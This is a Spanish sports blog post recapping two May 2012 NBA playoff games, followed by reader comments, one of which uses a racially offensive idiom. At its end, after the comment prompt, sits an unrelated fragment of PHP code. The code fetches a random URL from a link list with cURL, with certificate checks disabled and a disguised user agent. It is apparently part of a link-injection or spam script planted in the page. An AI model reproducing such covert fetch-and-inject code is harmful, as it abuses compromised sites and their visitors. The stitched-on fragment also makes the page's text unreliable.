La Crónica: Los ricos también lloran

15 de May de 2012 por TheDeerHunter

Había espectación y morbo por el inicio de la serie Thunder vs Lakers. Las dudas ayer se movían sobre el estado físico y mental con el que iban a afrontar la eliminatoria unos y otros. Los primeros implacables y descansados, los segundos irregulares y desgastados. Igualdad o paseo en barca…

También había expectación por comprobar el recibimiento a ex-Ron Artest por la parroquia del Chesapeake Energy Arena. Fue impresionante y es que una bienvenida a “lo Figo” no se ve todos los días en una cancha de la NBA. 18.000 almas abucheando su salida, marea azul. Cierto es que no es de los que se impresionan aunque de poco le sirvieron sus nervios de acero.

No fue el día para frenar a Durant. Si había dudas sobre la concentración y la templanza anímica de los Thunder pronto se despejaron. Rompió él, rompió Westbrook y rompió Harden, incluso a pesar de alguna caricia que aún se llevó del #15. Si no rompían, los Lakers aún les hacían algún regalito en forma de despiste o de las pérdidas de posesión que hicieran falta. ¿Control del ritmo de juego?¿Qué es eso? Los Thunder cosieron a contraataques a los Lakers en agradecimiento. Los cacareados sistemas defensivos de Mike Brown una vez más inexistentes. 100 puntos en 3 cuartos encajados, el resto minutos de basura. La peor paliza del año (90-119).

En ataque no mucho mejor. Extraordinario Sefolosha sobre Kobe, Ibaka o Collison sobre Pau, Sessions completamente desconectado… En definitiva, por lo visto ayer poca serie puede haber. Esto no ha hecho más que empezar, por otro lado.

En la acera de enfrente, los Celtics se vieron sorprendidos en el TD Garden (82-81). Primera victoria de playoffs en Boston de Doug Collins como entrenador. Planteó otro choque de trincheras, logrando sujetar bien tanto a Pierce como a Rondo y de paso se encontró con la irrupción de Lavoy Allen. Los Sixers consiguieron hacer la de sus rivales: Aguantar cada arreón del “green pride” para liarla casi al final, con un canastón de Evan Turner que recuerda extrañamente a los típicos de Pierce. 1-1 y hacia el Wachovia.

PREMIOS

MVP: Los dos mejores jugadores de la noche son del mismo equipo. Kevin Durant firmó un partido brillante de 25 puntos, 8 rebotes y 4 asistencias sin pérdidas y con un 50% en tiros de campo, pero el premio es para Russell Westbrook que con 27 puntos, 7 rebotes y 9 asistencias resultó absolutamente imparable para los Lakers.

Rookie: Lavoy Allen es protagonista de 2 secciones hoy, sus 10 puntos, 8 rebotes, 2 tapones y 2 robos fueron vitales en la victoria de los Sixers.

Sorpresa: El mismo Lavoy Allen.

Decepción: Los Celtics van a necesitar algo más que 7 puntos por parte de Paul Pierce. También se espera más que 2 puntos y un 1 de 7 en tiros de Ramon Sessions.

Esfuerzo en vano: Kevin Garnett está siendo el mejor verde durante todos los playoffs. Ayer sus 15 puntos y 12 rebotes no tuvieron premio. Mención también para Andrew Bynum que con 20 puntos y 14 rebotes fue el único amarillo que estuvo realmente a la altura de lo que se espera de el.

Imágenes | AP Photos / Getty Images

Comenta

13 comentarios a esta entrada

  1. simon dice:
    #1

    Primera victoria en Play Off como visitante??? Ya gano en primera ronda en Chicago.

      Citar

  2. txusma dice:
    #2

    simon:
    Primera victoria en Play Off como visitante??? Ya gano en primera ronda en Chicago.

    Está claro que la frase no era clara. Primera victoria de playoffs en Boston. Lo he editado para que quedara más claro.
    Gracias por el aviso.

      Citar

  3. TheDeerHunter dice:
    #3

    En Boston quería decir, sí. Lapsus

      Citar

  4. Nacho dice:
    #4

    Después de los dos truños de partido que he visto esta mañana, poco que comentar.
    En Boston se salva el último cuarto, por lo igualado y lo bien que han estado los Sixers, aguantando donde muchos creíamos que no lo harían.
    En Oklahoma, inicio esperanzador Laker, pero fue un Oasis. Sacaron la escoba los Thunder. Impresionante Westbrook (y eso que no me… ni fu ni fa), absolutamente equivocado (por ser suave) Sessions, que lleva unos playoffs para callar lo del robo que decía Denise.
    Y luego… Brown. Infame, fuera ya, por favor. Magic decía que Brooks tampoco es que sea la leche, pero por lo menos no va contra lo que pueden hacer sus jugadores (aunque minosvalora a Ibaka en ataque)
    De todas formas, esperable el partido. Siempre pensé que sería más fácil de robar el segundo de la serie, por cosas como esta, irán subidos de confianza Durant y compañía y eso les puede perjudicar. Ahora, como lo lógico es irse a LA con 2-0, todo dependerá de los dos partidos del Staples. Si los amarillos los cierran a su favor, tienen opciones, y hay un dato del que no hemos hablado, esos dos partidos son seguidos, factor que beneficia sensiblemente a los Thunder.

      Citar

  5. el rey lagarto dice:
    #5

    Pido una comisión de ejecución en el paredón para Brown y para Kutchap por traerlo a LA. ¿No había otro? Pepu Hernández (típico entrenador nivel bueno ACB) ve más baloncesto que Brown incluso con un ojo parcheado.
    Un saludo a todos.
    Lagarto.

      Citar

  6. Sancho88 dice:
    #6

    No sale en la cróncia Holiday? Pobre chico, qué tiene que hacer para ser reconocido? Eso sí, cuando las falla sale en la primera línea…

      Citar

  7. simon dice:
    #7

    La verdad es que no se entendio en su momento que firmaran a Brown ( con todos los buenos que habia en el mercado!!! ) y se confirma que fue una cagada, ahora digo yo, si nosotros, unos mindundis que no entendemos ni mierda de baloncesto comparado con ellos ( se supone ) y tenemos claro que Brown es un paquete… como cojones no se dan cuenta los q lo firmaron para Lakers??

      Citar

  8. HisRoyalAirness dice:
    #8

    Dios mío Mike Brown… Aún acabo de ver el partido y es para cesarlo ya. Los 3 primeros cuartos fueron todos los puntos de Durant y Westbrook de pick and pop!! Tremendo! Cómo se puede ser tan inútil? Y bueno, en el segundo cuarto se marcó la genialidad de emparejar a Blake con Harden…sin palabras.
    Pau sigue sin tirar FT, así van bien

      Citar

  9. rumbero dice:
    #9

    Visto los dos primeros cuartos (y el alley oop del tercero), lo de Westbrook ha sido un destrozo. Vale que tengo predilección por este jugador, y que suele ser bastante más errático de lo que ha estado hoy, pero coincido con Sancho en que los Lakers deben empezar por dejar que campe a sus anchas, sino es que lo van a tener casi imposible a ese ritmo. No vamos a enterrar ya a los Lakers por este partido (Kobe seguro nos tendrá algo preparado) pero nose si alguien cree que Brown dará con la tecla. Veremos…

      Citar

  10. nba dice:
    #10

    Quinteto titular Barnes-Bryant-MWP-Gasol-Perkins,
    la unica manera de parar la tromba Thunder

      Citar

  11. Ru dice:
    #11

    Poco más que añadir a los supuestos esquemas defensivos de Mike Brown para los Lakers,hoy si los ha habido se los han pasado por el forro.Puede ser que haya un punto de cansancio por la dura serie contra Denver pero si pesan ya las piernas a estas alturas mal lo veo para ellos.Pésima defensa tanto personal como tácticamente.Si Ron Artest dice que han jugado muy bien…que sigan así ya verán el 4-0 que se llevan.

    Por otro lado he de reconocer que si OKC gana el anillo me da un poco de miedo porque tampoco veo que hayan alcanzado su techo -Durant podría ser más obrero en defensa o Ibaka puede dar más de si ofensivamente- y podrian dominar la NBA unos cuantos años.Tampoco veo por otra parte que sean un prodigio de variantes tácticas atacando.Eso sí,la calidad de sus jugadores es descomunal.

      Citar

  12. simon dice:
    #12

    Por cierto Play off muy buenos del rookie Lavoy Allen,

      Citar

  13. GreenPride dice:
    #13

    Empecemos por mis queridos verdes. Los Celtics se dejaron robar el factor cancha pero… un momento, esta vez hay que dar crédito a los Sixers. Cuando apretó el sol de verdad en el último cuarto con los Celtics de nuevo remontando y anotando a buen ritmo fueron capaces de apretar los dientes y de salir adelante. Muy bien Iguodala, cuya defensa sobre Pierce está siendo clave y a gran nivel Holiday y Turner para conseguir la victoria. Por los Celtics, nada que objetar. Como dije no tienen piernas para ganar los partidos de calle pero con su experiencia casi siempre complican las cosas hasta llegar a los finales apretados donde se desenvuelven mejor que nadie. Esta vez no lo pudieron conseguir y creo que les esperan dos partidos difíciles en Phlly. Uno de los grandes problemas de Boston está siendo la malísima serie de tiro de Bass. Este hombre es especialmente importante pues su tiro de media distancia suele ser muy bueno y despeja la zona para KG y las penetraciones de Pierce y Rondo. Ahora no mete una y los Sixers le están flotando descaradamente lo que colapsa el ataque de los C’s. Sigo pensando que será una serie larga pero que al final si no hay lesiones, los Celtics se la acabarán llevando en 6 o 7 partidos.
    Y ahora vamos a por la eliminatoria de los Lakers. Sinceramente, no esperaba esta barrida para comenzar la serie. Vale que los Lakers venían cansados del 7º contra Denver y que los Thunder estaban descansados pero es que fue una merienda de negros tremenda. El primer cuarto debe dejar una idea de cómo deben competir los Lakers en esta eliminatoria. Mucho dominio de Pau-Bynum en el interior (que se agrandará si Perkins está lesionado) y un bueno MWP. Eso aderezado con un Kobe en modo PO debería bastar para dar guerra pero….. para conseguirlo deben bajar el culo a defender y aguantar las piernas jóvenes de los Thunder y ahí es donde de momento no han podido.
    Lo hablábamos en la previa, grave problema para Lakers cuando Westbrook y Harden están a la vez en la pista. Kobe puede cubrir a uno de ellos pero ni Sessions ni por supuesto Blake pueden hacer nada contra ellos. Esto se vió claro en este primer partido donde las penetraciones y tiros de ambos les hicieron papilla. Es un problema muy difícil de resover para los de LA pues Blake no tiene físico y Sessions no es un defensor válido. Podrían intentar poner a Barnes pero es demasiado lento y Harden ya le dejó un par de veces en evidencia en este partido.
    En el otro lado los Thunder suelen cometer muchas pérdidas lo que les suele lastrar pero en este partido sólo tuvieron 4. En parte les salió un partido perfecto, en parte la defensa angelina sabemos que es de las que menos pérdidas provoca. Además Sefolosha hizo una gran defensa sobre Kobe y sólo sufrieron al principio la ventaja interior de los Lakers. Esperemos por el bien de todos que los Lakers espabilen, se pongan las pilas en defensa y maten más por dentro para tener unas series interesantes, si no puede repetirse lo del año pasado con los Mavs

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>